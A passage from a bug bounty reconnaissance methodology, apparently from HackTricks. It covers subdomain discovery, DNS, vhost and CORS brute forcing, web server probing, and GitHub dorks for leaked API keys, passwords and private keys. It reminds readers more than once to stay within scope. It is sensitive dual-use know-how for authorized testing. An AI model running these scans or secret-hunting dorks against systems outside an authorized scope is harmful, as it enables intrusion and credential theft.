Another possibly interesting tool is [**gau**](https://github.com/lc/gau)**.** It fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain.
|
|
||||||
|
|
||||||
### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/)
|
|
||||||
|
|
||||||
This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
|
|
||||||
|
|
||||||
You could also find subdomains scrapping the web pages and parsing them \(including JS files\) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
|
|
||||||
|
|
||||||
### RapidDNS
|
|
||||||
|
|
||||||
Quickly find subdomains using [RapidDNS](https://rapiddns.io/) API \(from [link](https://twitter.com/Verry__D/status/1282293265597779968)\):
|
|
||||||
|
|
||||||
```text
|
|
||||||
rapiddns(){
|
|
||||||
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
|
|
||||||
| grep -oP '_blank">\K[^<]*' \
|
|
||||||
| grep -v http \
|
|
||||||
| sort -u
|
|
||||||
}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Shodan
|
|
||||||
|
|
||||||
You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
|
|
||||||
|
|
||||||
* http.html:”dev-int.bigcompanycdn.com”
|
|
||||||
* http.html:”[https://dev-int-bigcompanycdn.com”](https://dev-int-bigcompanycdn.com”)
|
|
||||||
|
|
||||||
## DNS Brute force
|
|
||||||
|
|
||||||
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.
|
|
||||||
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
|
|
||||||
|
|
||||||
For this action you will need some common subdomains lists like:
|
|
||||||
|
|
||||||
* [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056)
|
|
||||||
* [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak)
|
|
||||||
|
|
||||||
{% code title="Gobuster bruteforcing dns" %}
|
|
||||||
```bash
|
|
||||||
gobuster dns -d mysite.com -t 50 -w subdomains.txt
|
|
||||||
```
|
|
||||||
{% endcode %}
|
|
||||||
|
|
||||||
For **massdns** you will need to pass as argument the file will all the **possible well formed subdomains** you want to bruteforce and list of DNS resolvers to use. Some projects that use massdns as base and provides better results by checking massdns results are [**shuffledns**](https://github.com/projectdiscovery/shuffledns) **and** [**puredns**](https://github.com/d3mondev/puredns)**.**
|
|
||||||
|
|
||||||
```bash
|
|
||||||
sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt
|
|
||||||
./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt
|
|
||||||
grep -E "tesla.com. [0-9]+ IN A .+" /tmp/results.txt
|
|
||||||
|
|
||||||
shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt
|
|
||||||
puredns bruteforce all.txt domain.com
|
|
||||||
```
|
|
||||||
|
|
||||||
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
|
|
||||||
|
|
||||||
## VHosts
|
|
||||||
|
|
||||||
### IP VHosts
|
|
||||||
|
|
||||||
You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
|
|
||||||
|
|
||||||
### Brute Force
|
|
||||||
|
|
||||||
If you suspect that some subdomain can be hidden in a web server you could try to brute force it:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
gobuster vhost -u https://mysite.com -t 50 -w subdomains.txt
|
|
||||||
|
|
||||||
wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u http://example.com -t 100
|
|
||||||
|
|
||||||
#From https://github.com/allyshka/vhostbrute
|
|
||||||
vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com" --vhosts="vhosts_full.list"
|
|
||||||
```
|
|
||||||
|
|
||||||
{% hint style="info" %}
|
|
||||||
With this technique you may even be able to access internal/hidden endpoints.
|
|
||||||
{% endhint %}
|
|
||||||
|
|
||||||
## CORS Brute Force
|
|
||||||
|
|
||||||
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**.
|
|
||||||
|
|
||||||
```bash
|
|
||||||
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
|
|
||||||
```
|
|
||||||
|
|
||||||
## DNS Brute Force v2
|
|
||||||
|
|
||||||
Once you have finished looking for subdomains you can use [**dnsgen** ](https://github.com/ProjectAnte/dnsgen)and [**altdns**](https://github.com/infosec-au/altdns) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains.
|
|
||||||
|
|
||||||
## Buckets Brute Force
|
|
||||||
|
|
||||||
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](pentesting/pentesting-web/buckets/)**.**
|
|
||||||
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](pentesting/pentesting-web/buckets/).
|
|
||||||
|
|
||||||
## Monitorization
|
|
||||||
|
|
||||||
You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
|
|
||||||
|
|
||||||
## Looking for vulnerabilities
|
|
||||||
|
|
||||||
Check for possible [**subdomain takeovers**](pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).
|
|
||||||
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](pentesting/pentesting-web/buckets/).
|
|
||||||
|
|
||||||
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.
|
|
||||||
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
|
|
||||||
|
|
||||||
# Web servers hunting
|
|
||||||
|
|
||||||
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
|
|
||||||
|
|
||||||
In the previous steps probably you have already perform some **recon to the IPs and domains discovered**, so you may **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope.
|
|
||||||
|
|
||||||
Please, note that this will be **oriented to search for web apps**, you should **perform the vulnerability** and **port scanning** also \(**if allowed** by the scope\).
|
|
||||||
|
|
||||||
A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](pentesting/pentesting-network/#http-port-discovery).
|
|
||||||
Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe) **and** [**fprobe**](https://github.com/theblackturtle/fprobe). You just pass a list of domains and it will try to connect to port 80 \(http\) and 443 \(https\). You can additional indicate to try other ports:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443
|
|
||||||
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
|
|
||||||
```
|
|
||||||
|
|
||||||
## Screenshots
|
|
||||||
|
|
||||||
Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**.
|
|
||||||
|
|
||||||
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), \[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
|
|
||||||
|
|
||||||
# Recapitulation 1
|
|
||||||
|
|
||||||
> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done \(will see more tricks later\).
|
|
||||||
> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that.
|
|
||||||
|
|
||||||
So you have already:
|
|
||||||
|
|
||||||
1. Found all the **companies** inside the scope
|
|
||||||
2. Found all the **assets** belonging to the companies \(and perform some vuln scan if in scope\)
|
|
||||||
3. Found all the **domains** belonging to the companies
|
|
||||||
4. Found all the **subdomains** of the domains \(any subdomain takeover?\)
|
|
||||||
5. Found all the **web servers** and took a **screenshot** of them \(anything weird worth a deeper look?\)
|
|
||||||
|
|
||||||
Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** \(you can see a [guide for that here](pentesting/pentesting-network/)\), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open \(this book already contains tons of information about possible vulnerabilities on a lot of common services\). **But, don't forget that if the scope allows it, you should give it a try.**
|
|
||||||
|
|
||||||
# **Bug hunting OSINT related information**
|
|
||||||
|
|
||||||
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
|
|
||||||
|
|
||||||
## Api keys leaks in github
|
|
||||||
|
|
||||||
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
|
|
||||||
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
|
|
||||||
* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks)
|
|
||||||
* [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob)
|
|
||||||
* [https://github.com/anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets)
|
|
||||||
* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
|
|
||||||
* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks)
|
|
||||||
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
|
|
||||||
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
|
|
||||||
|
|
||||||
**Dorks**: _AWS\_SECRET\_ACCESS\_KEY, API KEY, API SECRET, API TOKEN… ROOT PASSWORD, ADMIN PASSWORD, COMPANYNAME SECRET, COMPANYNAME ROOT, GCP SECRET, AWS SECRET, “username password” extension:sql, “private” extension:pgp..._
|
|
||||||
|
|
||||||
### More Github Dorks
|
|
||||||
|
|
||||||
* extension:pem private
|
|
||||||
* extension:ppk private
|
|
||||||
* extension:sql mysql dump password
|
|
||||||
* extension:json api.forecast.io
|
|
||||||
* extension:json mongolab.com
|
|
||||||
* extension:yaml mongolab.com
|
|
||||||
* extension:ica \[WFClient\] Password=
|
|
||||||
* extension:avastlic “support.avast.com”
|
|
||||||
* extension:js jsforce conn.login
|
|
||||||
* extension:json googleusercontent client\_secret
|
|
||||||
|
|
||||||
You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key)
|
|
||||||
|
|
||||||
# [**Pentesting Web Methodology**](pentesting/pentesting-web/)
|
|
||||||
|
|
||||||
Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/).
|
|
||||||
|
|
||||||
# Recapitulation 2
|
|
||||||
|
|
||||||
> Congratulations! The testing has finished! I hope you have find some vulnerabilities.
|
|
||||||
|
|
||||||
At this point you should have already read the Pentesting Web Methodology and applied it to the scope.
|
|
||||||
As you can see there is a lot of different vulnerabilities to search for.
|
|
||||||
|
|
||||||
**If you have find any vulnerability thanks to this book, please reference the book in your write-up.**
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
||||||
|
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
||||||
|
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue